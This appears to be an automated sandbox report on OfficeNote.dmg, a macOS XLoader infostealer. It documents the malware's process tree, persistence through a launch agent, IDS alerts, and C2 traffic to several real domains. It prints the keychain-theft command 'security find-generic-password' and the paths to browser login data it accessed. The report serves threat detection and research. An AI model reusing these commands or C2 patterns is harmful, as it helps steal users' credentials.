Edit tour

macOS Analysis Report
OfficeNote.dmg

Overview

General Information

Sample Name:	OfficeNote.dmg
Analysis ID:	3305820
MD5:	8f8444dc9486a7f770c34b6d7cb67c05
SHA1:	5946452d1537cf2a0e28c77fa278554ce631223c
SHA256:	453e155722ac23771d63418e39f88430b0a922bd5f4afa81dcc73db44571b79e
Infos:

Detection

XLoader

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Searches for passwords in macOS's keychain

Snort IDS alert for network traffic

Yara detected XLoader

Writes Mach-O files to hidden directories

Accesses directories and/or files with sensitive browser data likely for credential stealing

Executes the "security" command used to access the keychain

Contains symbols with suspicious names likely related to anti-analysis

Executes hidden files

Creates memory-persistent launch services

Creates user-wide 'launchd' managed services aka launch agents

HTTP GET or POST without a user agent

Creates hidden files, links and/or directories

Mach-O contains sections with high entropy indicating compressed/encrypted content

Executes commands using a shell command-line interpreter

Writes 64-bit Mach-O files to disk

Creates application bundles

Executes the "rm" command used to delete files or directories

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.

General Information

Joe Sandbox Version:
Analysis ID:	3305820
Start date and time:	2023-08-23 14:51:42 +02:00
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 8m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Mac Mini, Apple Silicon ARM64, Ventura
macOS major version:	13
CPU architecture:	arm64
Analysis Mode:	default
Sample file name:	OfficeNote.dmg
Detection:	MAL
Classification:	mal84.troj.spyw.evad.macDMG@0/7@46/0

Warnings

Excluded IPs from analysis (whitelisted): 2.21.20.142, 2.21.20.146, 2.21.20.144, 2.21.20.141, 2.21.20.147, 2.21.20.139, 2.21.20.143, 2.21.20.140, 2.21.20.145, 192.229.221.95, 23.50.131.209, 23.50.131.205, 23.35.236.24, 23.206.208.134
Excluded domains from analysis (whitelisted): iadsdk.apple.com.edgekey.net, e673.dsce9.akamaiedge.net, a2047.dscapi9.akamai.net, stocks-data-service.apple.com, a1091.dscw154.akamai.net, weather-data.apple.com.akadns.net, iadsdk.apple.com, ocsp.digicert.com, weather-data.apple.com.akamaized.net, weather-data.apple.com, ocsp.edge.digicert.com, stocks-data-service.lb-apple.com.akadns.net, e4805.dsca.akamaiedge.net, stocks-data-service.apple.com.edgesuite.net, iadsdk.apple.com.akadns.net

Runtime Messages

Command:	open "/Volumes/OfficeNote/OfficeNote.app"
PID:	1004
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:
Standard Error:

Process Tree

System is mac-arm-ventura

mono-sgen64 New Fork (PID: 1004, Parent: 930)

open (MD5: ef617087070a1fd1b01573fd9668328c) Arguments: /usr/bin/open /Volumes/OfficeNote/OfficeNote.app

launchd New Fork (PID: 1005, Parent: 1)

xpcproxy (MD5: ec5cba9702c028c784fa75e8214bc95e) Arguments: xpcproxy application.OfficeNote.19.25

OfficeNote (MD5: 42f942691bec23b60dcd5a587a2ec43f) Arguments: /Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote

OfficeNote New Fork (PID: 1007, Parent: 1005)

sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c /Users/rodrigo/73a470tO

bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c /Users/rodrigo/73a470tO

73a470tO (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/73a470tO

73a470tO New Fork (PID: 1010, Parent: 1007)

sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

wvz4oTFps (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

wvz4oTFps (MD5: c68e9ab57bff9de72414c83d612636dc) Arguments: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

wvz4oTFps New Fork (PID: 1038, Parent: 1010)

sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c security find-generic-password -wa 'Chrome'

bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c security find-generic-password -wa 'Chrome'

security (MD5: 05bb69f46a91f9b057f2e279de6a9435) Arguments: security find-generic-password -wa Chrome

wvz4oTFps New Fork (PID: 1042, Parent: 1010)

sh (MD5: 68a37d17986d5af3dc693748d56e9248) Arguments: sh -c rm /Users/rodrigo/obdL0Dl8

bash (MD5: 2a6caea9db40595c35bd53120c9e1393) Arguments: sh -c rm /Users/rodrigo/obdL0Dl8

rm (MD5: dba08d0ccaff1fa37865ef9a1c8ed34d) Arguments: rm /Users/rodrigo/obdL0Dl8

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
/Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps	JoeSecurity_XLoader	Yara detected XLoader	Joe Security
/Users/rodrigo/73a470tO	JoeSecurity_XLoader	Yara detected XLoader	Joe Security

Snort Signatures

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 192.0.78.25

Timestamp:	192.168.0.56192.0.78.2549173802031412 08/23/23-14:54:30.991426
SID:	2031412
Source Port:	49173
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 192.0.78.25

Timestamp:	192.168.0.56192.0.78.2549167802031412 08/23/23-14:52:59.880394
SID:	2031412
Source Port:	49167
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 137.220.225.54

Timestamp:	192.168.0.56137.220.225.5449182802031412 08/23/23-14:55:48.955698
SID:	2031412
Source Port:	49182
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 146.148.179.231

Timestamp:	192.168.0.56146.148.179.23149169802031412 08/23/23-14:53:20.544201
SID:	2031412
Source Port:	49169
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 34.102.136.180

Timestamp:	192.168.0.5634.102.136.18049175802031412 08/23/23-14:54:55.545868
SID:	2031412
Source Port:	49175
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 192.0.78.25

Timestamp:	192.168.0.56192.0.78.2549184802031412 08/23/23-14:56:13.017651
SID:	2031412
Source Port:	49184
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.2

Timestamp:	192.168.0.564.2.2.260999532047696 08/23/23-14:52:49.208493
SID:	2047696
Source Port:	60999
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .brioche-amsterdam .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.157563532047686 08/23/23-14:55:06.724095
SID:	2047686
Source Port:	57563
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 104.21.26.182

Timestamp:	192.168.0.56104.21.26.18249177802031412 08/23/23-14:55:06.782645
SID:	2031412
Source Port:	49177
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.2

Timestamp:	192.168.0.564.2.2.257483532047695 08/23/23-14:52:34.627928
SID:	2047695
Source Port:	57483
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.163416532047696 08/23/23-14:52:48.789953
SID:	2047696
Source Port:	63416
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 66.29.151.121

Timestamp:	192.168.0.5666.29.151.12149165802031412 08/23/23-14:52:20.486977
SID:	2031412
Source Port:	49165
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 66.29.151.121

Timestamp:	192.168.0.5666.29.151.12149180802031412 08/23/23-14:55:37.109666
SID:	2031412
Source Port:	49180
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.164276532047693 08/23/23-14:54:44.293405
SID:	2047693
Source Port:	64276
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.2

Timestamp:	192.168.0.564.2.2.257571532047696 08/23/23-14:56:02.353133
SID:	2047696
Source Port:	57571
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 146.148.179.231

Timestamp:	192.168.0.56146.148.179.23149188802031412 08/23/23-14:56:33.382881
SID:	2031412
Source Port:	49188
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 137.220.225.54

Timestamp:	192.168.0.56137.220.225.5449166802031412 08/23/23-14:52:35.399112
SID:	2031412
Source Port:	49166
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 188.114.96.3

Timestamp:	192.168.0.56188.114.96.349168802031412 08/23/23-14:53:10.078120
SID:	2031412
Source Port:	49168
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 188.114.96.3

Timestamp:	192.168.0.56188.114.96.349186802031412 08/23/23-14:56:23.049901
SID:	2031412
Source Port:	49186
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 172.67.200.50

Timestamp:	192.168.0.56172.67.200.5049179802031412 08/23/23-14:55:16.860596
SID:	2031412
Source Port:	49179
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .spv88 .online) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.154348532047691 08/23/23-14:53:10.036329
SID:	2047691
Source Port:	54348
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .growind .info) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.155180532047697 08/23/23-14:52:20.278710
SID:	2047697
Source Port:	55180
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 104.21.71.149

Timestamp:	192.168.0.56104.21.71.14949190802031412 08/23/23-14:57:11.019298
SID:	2031412
Source Port:	49190
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 104.21.71.149

Timestamp:	192.168.0.56104.21.71.14949170802031412 08/23/23-14:53:59.333245
SID:	2031412
Source Port:	49170
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .activ-ketodietakjsy620 .cloud) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.2

Timestamp:	192.168.0.564.2.2.255184532047693 08/23/23-14:54:42.194250
SID:	2047693
Source Port:	55184
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN FormBook CnC Checkin (GET) - Source IP: 192.168.0.56 - Destination IP: 185.215.4.57

Timestamp:	192.168.0.56185.215.4.5749171802031412 08/23/23-14:54:09.796497
SID:	2031412
Source Port:	49171
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .corkagenexus .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.164207532047696 08/23/23-14:56:02.979015
SID:	2047696
Source Port:	64207
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN MacOS/XLOADER Domain in DNS Lookup (www .qq9122 .com) - Source IP: 192.168.0.56 - Destination IP: 4.2.2.1

Timestamp:	192.168.0.564.2.2.154298532047695 08/23/23-14:52:32.525567
SID:	2047695
Source Port:	54298
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /e8gp/ HTTP/1.1Host: www.skindocworld.comConnection: closeContent-Length: 120Cache-Control: no-cacheOrigin: http://www.skindocworld.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/603.3.8 (KHTML, like Gecko)Content-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.skindocworld.com/e8gp/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 68 63 30 4c 32 3d 51 78 46 41 34 56 76 44 55 53 28 5f 38 70 75 6b 61 61 50 46 48 65 76 33 28 49 6a 66 64 58 66 38 75 6e 58 61 70 53 57 4e 42 75 30 5a 41 39 73 6a 69 70 30 6a 4a 77 55 6a 72 4a 73 2d 70 73 38 5a 6b 32 58 41 50 41 7a 4d 73 5a 37 31 52 4d 33 56 7e 72 78 5a 4c 33 76 4a 45 49 37 73 4f 37 33 41 51 48 70 6e 66 42 4c 5a 4d 47 51 44 73 67 29 2e 00 00 00 00 00 00 00 Data Ascii: xhc0L2=QxFA4VvDUS(_8pukaaPFHev3(IjfdXf8unXapSWNBu0ZA9sjip0jJwUjrJs-ps8Zk2XAPAzMsZ71RM3V~rxZL3vJEI7sO73AQHpnfBLZMGQDsg).

Source: unknown

DNS traffic detected: queries for: fp2e7a.wpc.phicdn.net

Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40Ne&HDp=njTTUjRhh2_ HTTP/1.1Host: www.growind.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvA9&HDp=njTTUjRhh2_ HTTP/1.1Host: www.qq9122.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BGl&HDp=njTTUjRhh2_ HTTP/1.1Host: www.dalilamendezgallery.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQMe&HDp=njTTUjRhh2_ HTTP/1.1Host: www.spv88.onlineConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_ HTTP/1.1Host: www.kuailesms.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itwx&HDp=njTTUjRhh2_ HTTP/1.1Host: www.kuailesms.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFYo&HDp=njTTUjRhh2_ HTTP/1.1Host: www.xc3e3.funConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=1Opkd6I8Hw0hqQTwYPZT5403YNS0Jo6p5aB/dYESwIKFU9GO+2rSmzXSuAC0uGbmcK86ZqWa9QkknXVi4rO7fYkC/qyHgn6fvkxK&HDp=njTTUjRhh2_ HTTP/1.1Host: www.mixova.artConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=dztg7irefDCp7IGdZLb3CPbd7rvvYQvJkQuTo0GRPbERPNhZiuoJEigDg44bvuUZ82CvJV/5juSfRsm8qKEkcmvXDbHqPdO8Wxhf&HDp=njTTUjRhh2_ HTTP/1.1Host: www.skindocworld.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=jdN2yhs3x4p58YCD4U7n/gj8BurDXSdvL7HLiEUfYbhgZbFQI7BchpBTg2Lpqi+Gn9rfegZCc3gTj3ynTxQL940J2lKkq4WtWM4f&HDp=njTTUjRhh2_ HTTP/1.1Host: www.greaterudition.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=Ab6vRTzAMfHQY4XdwhW7wtbhx8W7NHCMdlU0DyCHtsf2UMNfDFsTdFwISOrS2vaK2PSRorBz9aFTNso43ncynBJgfEZaaeKMLRlW&HDp=njTTUjRhh2_ HTTP/1.1Host: www.brioche-amsterdam.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=oNopsgYov2zFzHOYq9j5/w4HKjdoqPfC5Sc2oZNy6d0vNaNSOmDp+kl5mvv/3C1TW3Bgx4jTjeuRFSZZthnMZyYwXoq0jNZF75DM&HDp=njTTUjRhh2_ HTTP/1.1Host: www.gms-medika.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=61qgLCVmwiYhY1k2gwUpsEeOxq+LhUlbpqnlW+J5fZEqilNytgGabqEunmU6yZQuNKMgwmW03tX/qZ3Mu/pSbEMh+Akeuw6b40OS&HDp=njTTUjRhh2_ HTTP/1.1Host: www.growind.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=G6GjsaNDtV5maraECMSXUn3FSCtRKV1Yp4GXMeLxBdS68XFM8fFuCoaVmKMc0ET9CHVV/OPPkHt3Jw9s8vpJASqqNeAMqtPwvvDx&HDp=njTTUjRhh2_ HTTP/1.1Host: www.qq9122.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=7ohy4xQNzEvyJOUXqQIxQK/6m66/e2xRAEQtQV87DDNIcHu63YMrZBFkAKfGBEVRxo3xV5Yf4dXQnrjI8dL8Qf9nzSQEAzsJ3BFp&HDp=njTTUjRhh2_ HTTP/1.1Host: www.dalilamendezgallery.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=6eBq3For9zap+5OTHjEdFb+cgnEpiUG6j5oni2dGM+5uq+KZcTGOclOU9yeLFqZHdTK7cjefMM3qdKtOujwsYhywHZZM/a68NQPS&HDp=njTTUjRhh2_ HTTP/1.1Host: www.spv88.onlineConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=xGycCDLXwFlD+OnV5wrRAoWjiweuMz9Ju1yK0Of5U14HoqAK3y5ZJ513OPQC3HV1XCE6HQHGmC1hedXCJaVT5rHtWdIcIJC/itz9&HDp=njTTUjRhh2_ HTTP/1.1Host: www.kuailesms.netConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /e8gp/?xhc0L2=Pv2HIUgDB7Qa+wzzBoxyDE7uYtzxjTUpRgqcrt0uAAtucffTC6N1FqpKGtHQdbXZZnJrDGurKZENAMbphLYijutqjr515/wKHFbk&HDp=njTTUjRhh2_ HTTP/1.1Host: www.xc3e3.funConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected XLoader

Source: Yara match	File source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps, type: DROPPED
Source: Yara match	File source: /Users/rodrigo/73a470tO, type: DROPPED

Source: classification engine

Classification label: mal84.troj.spyw.evad.macDMG@0/7@46/0

Source: obdL0Dl8.102.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Persistence and Installation Behavior

Writes Mach-O files to hidden directories

Source: /Users/rodrigo/73a470tO (PID: 1007)

64-bit Mach-O written to hidden directory: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps

Jump to dropped file

Executes hidden files

Source: /bin/bash (PID: 1010)	File in hidden directory executed: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps			Jump to behavior
Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps (PID: 1010)	File in hidden directory executed: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps			Jump to behavior

Source: /Users/rodrigo/73a470tO (PID: 1007)

Hidden Directory created: /Users/rodrigo/.CdoPv -> /Users/rodrigo/.CdoPv

Jump to behavior

Source: /Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote (PID: 1007)	Shell command executed: sh -c /Users/rodrigo/73a470tO	Jump to behavior
Source: /bin/sh (PID: 1007)	Shell command executed: sh -c /Users/rodrigo/73a470tO	Jump to behavior
Source: /Users/rodrigo/73a470tO (PID: 1010)	Shell command executed: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps	Jump to behavior
Source: /bin/sh (PID: 1010)	Shell command executed: sh -c /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps	Jump to behavior
Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps (PID: 1038)	Shell command executed: sh -c security find-generic-password -wa 'Chrome'	Jump to behavior
Source: /bin/sh (PID: 1038)	Shell command executed: sh -c security find-generic-password -wa 'Chrome'	Jump to behavior
Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps (PID: 1042)	Shell command executed: sh -c rm /Users/rodrigo/obdL0Dl8	Jump to behavior
Source: /bin/sh (PID: 1042)	Shell command executed: sh -c rm /Users/rodrigo/obdL0Dl8	Jump to behavior

Source: /Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote (PID: 1005)	File written: /Users/rodrigo/73a470tO			Jump to dropped file
Source: /Users/rodrigo/73a470tO (PID: 1007)	File written: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps			Jump to dropped file

Source: /Users/rodrigo/73a470tO (PID: 1007)

Bundle Info.plist File created: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/Info.plist

Jump to behavior

Source: /bin/bash (PID: 1042)

Rm executable: /bin/rm -> rm /Users/rodrigo/obdL0Dl8

Jump to behavior

Source: extracted file from submission: OfficeNote\OfficeNote.app\Contents\MacOS\OfficeNote

Mach-O header: dylib_command -> /System/Library/Frameworks/AppKit.framework/Versions/C/AppKit

Source: /Users/rodrigo/73a470tO (PID: 1007)	XML plist file created: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/Info.plist			Jump to dropped file
Source: /Users/rodrigo/73a470tO (PID: 1007)	XML plist file created: /Users/rodrigo/Library/LaunchAgents/com.CdoPv.wvz4oTFps.plist			Jump to dropped file

Source: extracted file from DMG submission

CodeResources XML file: OfficeNote/OfficeNote.app/Contents/_CodeSignature/CodeResources

Source: submission

CodeSign Info: Executable=/Volumes/OfficeNote/OfficeNote.app/Contents/MacOS/OfficeNote

Source: /Users/rodrigo/73a470tO (PID: 1007)

Launch agent/daemon created with KeepAlive and/or RunAtLoad, file created: /Users/rodrigo/Library/LaunchAgents/com.CdoPv.wvz4oTFps.plist

Jump to behavior

Source: /Users/rodrigo/73a470tO (PID: 1007)

Launch agent created File created: /Users/rodrigo/Library/LaunchAgents/com.CdoPv.wvz4oTFps.plist

Jump to behavior

Source: OfficeNote\OfficeNote.app\Contents\MacOS\OfficeNote	Extracted file: section __text with 7.9899 entropy (max. 8.0)
Source: 73a470tO.84.dr	Dropped file: section __text with 7.1216 entropy (max. 8.0)
Source: wvz4oTFps.93.dr	Dropped file: section __text with 7.1216 entropy (max. 8.0)

Malware Analysis System Evasion

Contains symbols with suspicious names likely related to anti-analysis

Source: extracted file from submission: OfficeNote\OfficeNote.app\Contents\MacOS\OfficeNote

Mach-O symbol: _ptrace

Stealing of Sensitive Information

Searches for passwords in macOS's keychain

Source: /bin/bash (PID: 1038)

Security executable: /usr/bin/security security find-generic-password -wa Chrome

Jump to behavior

Yara detected XLoader

Source: Yara match	File source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps, type: DROPPED
Source: Yara match	File source: /Users/rodrigo/73a470tO, type: DROPPED

Accesses directories and/or files with sensitive browser data likely for credential stealing

Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps (PID: 1010)	Sensitive file/directory: /Users/rodrigo/Library/Application Support/Firefox/Profiles	Jump to behavior
Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps (PID: 1010)	Sensitive file/directory: /Users/rodrigo/Library/Application Support/Firefox/Profiles	Jump to behavior
Source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps (PID: 1010)	Sensitive file/directory: /Users/rodrigo/Library/Application Support/Google/Chrome/Default/Login Data	Jump to behavior

Executes the "security" command used to access the keychain

Source: /bin/bash (PID: 1038)

Security executable: /usr/bin/security security find-generic-password -wa Chrome

Jump to behavior

Remote Access Functionality

Yara detected XLoader

Source: Yara match	File source: /Users/rodrigo/.CdoPv/wvz4oTFps.app/Contents/MacOS/wvz4oTFps, type: DROPPED
Source: Yara match	File source: /Users/rodrigo/73a470tO, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Scripting	2 Launch Agent	2 Launch Agent	1 Virtualization/Sandbox Evasion	1 GUI Input Capture	1 Virtualization/Sandbox Evasion	Remote Services	1 GUI Input Capture	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	1 Launch Daemon	1 Launch Daemon	1 Scripting	2 Keychain	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	4 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
